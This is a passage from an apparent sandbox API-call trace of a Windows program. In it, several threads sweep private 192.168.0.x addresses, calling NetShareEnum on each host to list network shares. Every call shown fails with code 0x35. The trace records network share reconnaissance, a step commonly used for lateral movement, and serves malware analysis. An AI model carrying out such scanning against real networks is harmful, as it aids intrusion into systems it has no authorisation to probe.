lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.405] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x609fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x609fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.409] NetShareEnum (in: servername="\\\\192.168.0.249", level=0x1, bufptr=0x609fedc, prefmaxlen=0xffffffff, entriesread=0x609fed4, totalentries=0x609fed0, resume_handle=0x609fecc | out: bufptr=0x609fedc, entriesread=0x609fed4, totalentries=0x609fed0, resume_handle=0x609fecc) returned 0x35 [0258.078] SetEvent (hEvent=0x1dc) returned 1 [0258.078] RtlExitUserThread (Status=0x0) Thread: id = 71 os_tid = 0xcc4 [0089.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.54", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.54", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.54", lpUsedDefaultChar=0x0) returned 14 [0089.087] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x61dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.087] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x61dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.087] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x61dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x61dfc54*=0x10, lpOverlapped=0x0) returned 1 [0089.147] NetShareEnum (in: servername="\\\\192.168.0.54", level=0x1, bufptr=0x61dfedc, prefmaxlen=0xffffffff, entriesread=0x61dfed4, totalentries=0x61dfed0, resume_handle=0x61dfecc | out: bufptr=0x61dfedc, entriesread=0x61dfed4, totalentries=0x61dfed0, resume_handle=0x61dfecc) returned 0x35 [0144.439] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.111", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.439] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.111", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.111", lpUsedDefaultChar=0x0) returned 15 [0144.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x61dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.439] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.439] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.439] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x61dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.439] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.439] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.439] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x61dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x61dfc54*=0x11, lpOverlapped=0x0) returned 1 [0144.443] NetShareEnum (in: servername="\\\\192.168.0.111", level=0x1, bufptr=0x61dfedc, prefmaxlen=0xffffffff, entriesread=0x61dfed4, totalentries=0x61dfed0, resume_handle=0x61dfecc | out: bufptr=0x61dfedc, entriesread=0x61dfed4, totalentries=0x61dfed0, resume_handle=0x61dfecc) returned 0x35 [0178.337] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.169", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.337] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.169", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.169", lpUsedDefaultChar=0x0) returned 15 [0178.337] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x61dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.337] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.337] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.337] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x61dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.337] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.337] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.337] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x61dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x61dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.341] NetShareEnum (in: servername="\\\\192.168.0.169", level=0x1, bufptr=0x61dfedc, prefmaxlen=0xffffffff, entriesread=0x61dfed4, totalentries=0x61dfed0, resume_handle=0x61dfecc | out: bufptr=0x61dfedc, entriesread=0x61dfed4, totalentries=0x61dfed0, resume_handle=0x61dfecc) returned 0x35 [0211.207] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.238", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.207] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.238", cchWideChar=15, lpMultiByteStr=0x1e8316c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.238", lpUsedDefaultChar=0x0) returned 15 [0211.207] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x61dfc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x61dfc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x61dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.494] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.494] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x61dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.494] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.494] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.494] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x61dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x61dfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.495] NetShareEnum (in: servername="\\\\192.168.0.238", level=0x1, bufptr=0x61dfedc, prefmaxlen=0xffffffff, entriesread=0x61dfed4, totalentries=0x61dfed0, resume_handle=0x61dfecc | out: bufptr=0x61dfedc, entriesread=0x61dfed4, totalentries=0x61dfed0, resume_handle=0x61dfecc) returned 0x35 [0257.999] SetEvent (hEvent=0x1dc) returned 1 [0257.999] RtlExitUserThread (Status=0x0) Thread: id = 72 os_tid = 0xcc8 [0089.070] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.51", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.070] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.51", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.51", lpUsedDefaultChar=0x0) returned 14 [0089.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x631ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.070] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.070] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x631ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.070] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.070] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.070] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x631fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x631fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.076] NetShareEnum (in: servername="\\\\192.168.0.51", level=0x1, bufptr=0x631fedc, prefmaxlen=0xffffffff, entriesread=0x631fed4, totalentries=0x631fed0, resume_handle=0x631fecc | out: bufptr=0x631fedc, entriesread=0x631fed4, totalentries=0x631fed0, resume_handle=0x631fecc) returned 0x35 [0144.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.117", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.117", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.117", lpUsedDefaultChar=0x0) returned 15 [0144.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x631ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x631ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.500] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x631fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x631fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.504] NetShareEnum (in: servername="\\\\192.168.0.117", level=0x1, bufptr=0x631fedc, prefmaxlen=0xffffffff, entriesread=0x631fed4, totalentries=0x631fed0, resume_handle=0x631fecc | out: bufptr=0x631fedc, entriesread=0x631fed4, totalentries=0x631fed0, resume_handle=0x631fecc) returned 0x35 [0178.223] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.154", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.223] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.154", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.154", lpUsedDefaultChar=0x0) returned 15 [0178.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x631ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.223] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.223] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x631ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.224] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.224] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.224] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x631fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x631fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.228] NetShareEnum (in: servername="\\\\192.168.0.154", level=0x1, bufptr=0x631fedc, prefmaxlen=0xffffffff, entriesread=0x631fed4, totalentries=0x631fed0, resume_handle=0x631fecc | out: bufptr=0x631fedc, entriesread=0x631fed4, totalentries=0x631fed0, resume_handle=0x631fecc) returned 0x35 [0211.208] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.242", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.208] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.242", cchWideChar=15, lpMultiByteStr=0x1e831ec, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.242", lpUsedDefaultChar=0x0) returned 15 [0211.208] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x631fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x631fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x631ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.484] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.484] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x631ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.484] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.484] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.484] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x631fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x631fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.485] NetShareEnum (in: servername="\\\\192.168.0.242", level=0x1, bufptr=0x631fedc, prefmaxlen=0xffffffff, entriesread=0x631fed4, totalentries=0x631fed0, resume_handle=0x631fecc | out: bufptr=0x631fedc, entriesread=0x631fed4, totalentries=0x631fed0, resume_handle=0x631fecc) returned 0x35 [0258.030] SetEvent (hEvent=0x1dc) returned 1 [0258.030] RtlExitUserThread (Status=0x0) Thread: id = 73 os_tid = 0xccc [0089.076] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.52", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.076] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.52", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.52", lpUsedDefaultChar=0x0) returned 14 [0089.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x645ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.076] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.076] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x645ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.076] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.076] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.076] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x645fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x645fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.081] NetShareEnum (in: servername="\\\\192.168.0.52", level=0x1, bufptr=0x645fedc, prefmaxlen=0xffffffff, entriesread=0x645fed4, totalentries=0x645fed0, resume_handle=0x645fecc | out: bufptr=0x645fedc, entriesread=0x645fed4, totalentries=0x645fed0, resume_handle=0x645fecc) returned 0x35 [0144.448] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.112", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.448] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.112", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.112", lpUsedDefaultChar=0x0) returned 15 [0144.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x645ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.448] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, 